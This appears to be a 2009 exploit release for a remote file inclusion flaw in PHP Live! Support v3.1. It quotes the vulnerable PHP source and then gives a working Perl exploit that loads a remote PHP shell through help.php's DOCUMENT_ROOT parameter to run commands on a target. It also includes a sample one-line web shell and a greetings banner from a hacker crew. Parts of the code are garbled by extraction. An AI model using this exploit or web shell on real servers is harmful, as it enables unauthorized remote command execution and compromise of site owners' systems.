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OSI Codes PHP Live! Support version 3.1 suffers from a remote file inclusion vul
来源:http://www.indonesiancoder.com/ 作者:Tukulesto 发布时间:2009-11-24  
# [�] Author	: Don Tukulesto (root@indonesiancoder.com)
# [�] Date 	: November 23, 2009
# [�] Homepage	: http://www.indonesiancoder.com
# [�] Method	: Remote File Inclusion
# [�] Location 	: INDONESIA
# [�] Vendor 	: http://www.phplivesupport.com/
# [�] Describe	: PHP Live! Support v3.1 (c) by OSI Codes Inc.                                                      
# Chat with your website visitors with PHP Live!
#    * Provide Live Support on your Website
#    * Increase your Sales
#    * Increase Customer Satisfaction
#    * Decrease your phone/operational costs
# [�] Usage	:
# perl tux.pl <target> <weapon url> cmd
# perl tux.pl http://www.indonesiancoder.org/shell.txt cmd
# Weapon example: <?php system(
GET['cmd']); ?> ##### <!--more--> # [-] Bugs in [+] index.php <pre lang="php"> <?php /******************************************************* * COPYRIGHT OSI CODES - PHP Live! *******************************************************/ session_start() ; $l = "" ; // try to get cookie value first if ( isset(
GET['l'] ) ) { $l =
GET['l'] ; } if ( isset(
POST['l'] ) ) { $l =
POST['l'] ; } if ( !file_exists( "./web/conf-init.php" ) ) { HEADER( "location: setup/index.php" ) ; exit ; } include_once( "./API/Util_Dir.php" ) ; if ( Util_DIR_CheckDir( ".", $l ) ) include_once("./web/$l/$l-conf-init.php") ; include_once("./web/conf-init.php") ; $DOCUMENT_ROOT = realpath( preg_replace( "/http:/", "", $DOCUMENT_ROOT ) ) ; include_once("$DOCUMENT_ROOT/API/Util_Error.php") ; include_once("$DOCUMENT_ROOT/system.php") ; include_once("$DOCUMENT_ROOT/lang_packs/$LANG_PACK.php") ; include_once("$DOCUMENT_ROOT/web/VERSION_KEEP.php") ; include_once("$DOCUMENT_ROOT/API/Util_CleanFiles.php") ; include_once("$DOCUMENT_ROOT/API/sql.php" ) ; include_once("$DOCUMENT_ROOT/API/Users/get.php") ; include_once("$DOCUMENT_ROOT/API/Users/update.php") ; include_once("$DOCUMENT_ROOT/API/Chat/remove.php") ; include_once("$DOCUMENT_ROOT/API/ASP/get.php") ; // initialize $action = $error = $sid = $site = $remember = "" ; $sound_file = "cellular.wav" ; $isadmin = $winapp = $autologin = $wflag = $closewin = 0 ; if ( !isset(
SESSION['session_admin'] ) ) { session_register( "session_admin" ) ; $session_admin = ARRAY() ;
SESSION['session_admin'] = ARRAY() ; } // check to see if the site login is passes. if not, then let's see how many // sites are in the asp model. if only ONE, then default to that one. $total_sites = AdminASP_get_TotalUsers( $dbh ) ; if ( $total_sites == 1 ) { $site = AdminASP_get_AllUsers( $dbh, 0, 1 ) ; $l = $site[0]['login'] ; } if ( isset( $LOGO ) && file_exists( "$DOCUMENT_ROOT/web/$l/$LOGO" ) && $LOGO ) $logo = "$BASE_URL/web/$l/$LOGO" ; else if ( file_exists( "$DOCUMENT_ROOT/web/$LOGO_ASP" ) && $LOGO_ASP ) $logo = "$BASE_URL/web/$LOGO_ASP" ; else $logo = "$BASE_URL/images/logo.gif" ; // get variables if ( isset(
POST['action'] ) ) { $action =
POST['action'] ; } if ( isset(
GET['action'] ) ) { $action =
GET['action'] ; } if ( isset(
POST['winapp'] ) ) { $winapp =
POST['winapp'] ; } if ( isset(
GET['winapp'] ) ) { $winapp =
GET['winapp'] ; } if ( isset(
GET['wflag'] ) ) { $wflag =
GET['wflag'] ; } if ( isset(
GET['closewin'] ) && (
GET['closewin'] != "undefined" ) ) { $closewin =
GET['closewin'] ; } // conditions if ( ( isset(
COOKIE['COOKIE_PHPLIVE_SITE'] ) ) && !$action ) $autologin = 1 ; if ( $action == "login" ) { if ( $l ) $site = $l ; else $site =
POST['site'] ; $aspinfo = AdminASP_get_ASPInfoByASPLogin( $dbh, $site ) ; $admin = AdminUsers_get_UserInfoByLoginPass( $dbh,
POST['password'], $aspinfo['aspID'] ) ; if ( !$aspinfo['active_status'] ) $error = "Servi?o est? inativo. Entre em contato com o administrador para obter detalhes setup." ; else { if ( $admin['userID'] && ( $admin['aspID'] == $aspinfo['aspID'] ) ) { CleanFiles_util_CleanChatSessionFiles() ; // set $sid. $sid is used to keep track of this admin user. $sid allows // so a user can log into several admin departments on same computer. it is // passed everywhere the admin goes. $sid = time() ; $departments = AdminUsers_get_UserDepartments( $dbh, $admin['userID'] ) ; $dept_string = "" ; for ( $c = 0; $c < count( $departments ); ++$c ) { $the_department = $departments[$c] ; $dept_string .= "deptID = $the_department[deptID] OR " ; } $dept_string .= "deptID = 0" ;
SESSION['session_admin'][$sid] = ARRAY() ;
SESSION['session_admin'][$sid]['dept_string'] = $dept_string ;
SESSION['session_admin'][$sid]['admin_id'] = $admin['userID'] ;
SESSION['session_admin'][$sid]['requests'] = 0 ;
SESSION['session_admin'][$sid]['aspID'] = $aspinfo['aspID'] ;
SESSION['session_admin'][$sid]['asp_login'] = $aspinfo['login'] ;
SESSION['session_admin'][$sid]['active_footprints'] = 0 ;
SESSION['session_admin'][$sid]['winapp'] = "$winapp" ;
SESSION['session_admin'][$sid]['close_timer'] = 0 ;
SESSION['session_admin'][$sid]['traffic_monitor'] = 0 ;
SESSION['session_admin'][$sid]['available_status'] = 1 ;
SESSION['session_admin'][$sid]['sound'] = "on" ;
SESSION['session_admin'][$sid]['request_ids'] = "" ;
SESSION['session_admin'][$sid]['traffic_timer'] = $admin['console_refresh'] ; $isadmin = 1 ; // check to see if they want to be remembered... if so, just set cookie. // let's set it for 1 month for now. $cookie_lifespan = time() + 60*60*24*30 ; if ( isset(
POST['remember'] ) ) { setcookie( "COOKIE_PHPLIVE_LOGIN",
POST['login'], $cookie_lifespan ) ; setcookie( "COOKIE_PHPLIVE_PASSWORD",
POST['password'], $cookie_lifespan ) ; setcookie( "COOKIE_PHPLIVE_SITE", $aspinfo['login'], $cookie_lifespan ) ; } } else { // reset cookie if cookies are set if ( isset(
COOKIE['COOKIE_PHPLIVE_PASSWORD'] ) ) { setcookie( "COOKIE_PHPLIVE_LOGIN", "", -1 ) ; setcookie( "COOKIE_PHPLIVE_PASSWORD", "", -1 ) ; setcookie( "COOKIE_PHPLIVE_SITE", "", -1 ) ; } $error = "Falha de Login. Nota: sua senha ? (CaSE senSiTiVE)." ; } } } else if ( $action == "logout" ) { if ( isset(
COOKIE['COOKIE_PHPLIVE_PASSWORD'] ) && !$wflag ) { setcookie( "COOKIE_PHPLIVE_LOGIN", "", -1 ) ; setcookie( "COOKIE_PHPLIVE_PASSWORD", "", -1 ) ; setcookie( "COOKIE_PHPLIVE_SITE", "", -1 ) ; } $sid =
GET['sid'] ; $l =
SESSION['session_admin'][$sid]['asp_login'] ; AdminUsers_update_Status( $dbh,
SESSION['session_admin'][$sid]['admin_id'], 0 ) ; AdminUsers_update_UserValue( $dbh,
SESSION['session_admin'][$sid]['admin_id'], "last_active_time", $admin_idle - 300 ) ;
SESSION['session_admin'] = Array() ; HEADER( "location: index.php?wflag=$wflag&l=$l&winapp=$winapp&closewin=$closewin" ) ; exit ; } else { // do the cleaning of the chat database of old requests and sessions. ServiceChat_remove_CleanChatSessionList( $dbh ) ; ServiceChat_remove_CleanChatSessions( $dbh ) ; ServiceChat_remove_CleanChatRequests( $dbh ) ; } ?> </pre> [+] chat.php <pre lang="php"> <?php /******************************************************* * COPYRIGHT OSI CODES - PHP Live! *******************************************************/ session_start() ; $session_chat =
SESSION['session_chat'] ; $sid = ( isset(
GET['sid'] ) ) ?
GET['sid'] : "" ; $requestid = ( isset(
GET['requestid'] ) ) ?
GET['requestid'] : "" ; $sessionid = ( isset(
GET['sessionid'] ) ) ?
GET['sessionid'] : "" ; $userid = ( isset(
GET['userid'] ) ) ?
GET['userid'] : "" ; $action = ( isset(
GET['action'] ) ) ?
GET['action'] : "" ; if ( !file_exists( "web/".$session_chat[$sid]['asp_login']."/".$session_chat[$sid]['asp_login']."-conf-init.php" ) || !file_exists( "web/conf-init.php" ) ) { print "<font color=\"#FF0000\">[Configuration Error: config files not found! -$sid] Exiting...</font>" ; exit ; } include_once("./web/conf-init.php") ; $DOCUMENT_ROOT = realpath( preg_replace( "/http:/", "", $DOCUMENT_ROOT ) ) ; include_once("$DOCUMENT_ROOT/web/".$session_chat[$sid]['asp_login']."/".$session_chat[$sid]['asp_login']."-conf-init.php") ; include_once("$DOCUMENT_ROOT/system.php") ; include_once("$DOCUMENT_ROOT/lang_packs/$LANG_PACK.php") ; include_once("$DOCUMENT_ROOT/API/sql.php") ; include_once("$DOCUMENT_ROOT/API/Chat/update.php") ; // set frame row properties depending if admin or regular request $frame_row_properties = "*,100%" ; if ( $session_chat[$sid]['isadmin'] && $session_chat[$sid]['deptid'] ) $frame_row_properties = "*,100%" ; // let's start the poll time
SESSION['session_chat'][$sid]['admin_poll_time'] = time() ; $window_title = preg_replace( "/<(.*)>/", "", $session_chat[$sid]['visitor_name'] ) .": Support Request" ; ?> </pre> [+] help.php <pre lang="php"> <?php /******************************************************* * COPYRIGHT OSI CODES - PHP Live! *******************************************************/ include_once("./web/conf-init.php"); $DOCUMENT_ROOT = realpath( preg_replace( "/http:/", "", $DOCUMENT_ROOT ) ) ; include_once("$DOCUMENT_ROOT/system.php") ; include_once("$DOCUMENT_ROOT/lang_packs/$LANG_PACK.php") ; include_once("$DOCUMENT_ROOT/web/VERSION_KEEP.php") ; include_once("$DOCUMENT_ROOT/API/sql.php") ; // initialize $action = "" ; if ( preg_match( "/(MSIE)|(Gecko)/",
SERVER['HTTP_USER_AGENT'] ) ) $text_width = "12" ; else $text_width = "9" ; $success = 0 ; // update all admins status to not available if they have been idle // get variables if ( isset(
POST['action'] ) ) { $action =
POST['action'] ; } if ( isset(
GET['action'] ) ) { $action =
GET['action'] ; } ?> </pre> [-] PoC [-] eXpL0!t c0des <pre lang="perl"> #!/usr/bin/perl use HTTP::Request; use LWP::UserAgent; $RoNz = $ARGV[0]; $Pathloader = $ARGV[1]; $Contrex = $ARGV[2]; if($RoNz!~/http:\/\// || $Pathloader!~/http:\/\// || !$Contrex){usage()} head(); sub head() { print "[o]============================================================================[o]\r\n"; print " | PHP Live! Support v3.1 Multiple Remote File Include |\r\n"; print "[o]============================================================================[o]\r\n"; } while() { print "[w00t] \___FCKpd___0quot;; while(<STDIN>) { $kaMtiEz=
; chomp($kaMtiEz); $arianom = LWP::UserAgent->new() or die; $tiw0L = HTTP::Request->new(GET =>$RoNz.'help.php?DOCUMENT_ROOT='.$Pathloader.'?&'.$Contrex.'='.$kaMtiEz)or die "\nCould Not connect\n"; $abah_benu = $arianom->request($tiw0L); $tukulesto = $abah_benu->content; $tukulesto =~ tr/[\n]/[�]/; if (!$kaMtiEz) {print "\nPlease Enter a Command\n\n"; $tukulesto ="";} elsif ($tukulesto =~/failed to open stream: HTTP request denied!/ || $tukulesto =~/: Cannot execute a blank command in /) {print "\nCann't Connect to cmd Host or Invalid Command\n";exit} elsif ($tukulesto =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"} if($tukulesto =~ /(.*)/) { $finreturn = $1; $finreturn=~ tr/[�]/[\n]/; print "\r\n$finreturn\n\r"; last; } else {print "[w00t] \___FCKpd___0quot;;}}}last; sub usage() { head(); print " | Usage: perl tux.pl <target> <weapon url> <cmd> |\r\n"; print " | <Site> - Full path to execute ex: |\r\n"; print " | <Weapon url> - Path to Shell e.g http://www.indonesiancoder.org/shell.txt |\r\n"; print " | <cmd> - Command variable used in php shell |\r\n"; print "[o]============================================================================[o]\r\n"; print " | IndonesianCoder Team | KILL-9 CREW | ServerIsDown | AntiSecurity.org |\r\n"; print " | kaMtiEz, M3NW5, arianom, tiw0L, Pathloader, abah_benu, VycOd, Gh4mb4S |\r\n"; print " | M364TR0N, TUCKER, Ian Petrucii, kecemplungkalen, NoGe, bh4nd55, MainHack.Net |\r\n"; print " | Jack-, Contrex, yadoy666, Ronz, noname, s4va, gonzhack, cyb3r_tron, saint |\r\n"; print " | Awan Bejat, Plaque, rey_cute, BennyCooL, SurabayaHackerLink Team and YOU! |\r\n"; print "[o]============================================================================[o]\r\n"; print " | http://www.IndonesianCoder.org | http://www.AntiSecRadio.fm |\r\n"; print "[o]============================================================================[o]\r\n"; exit(); } </pre>

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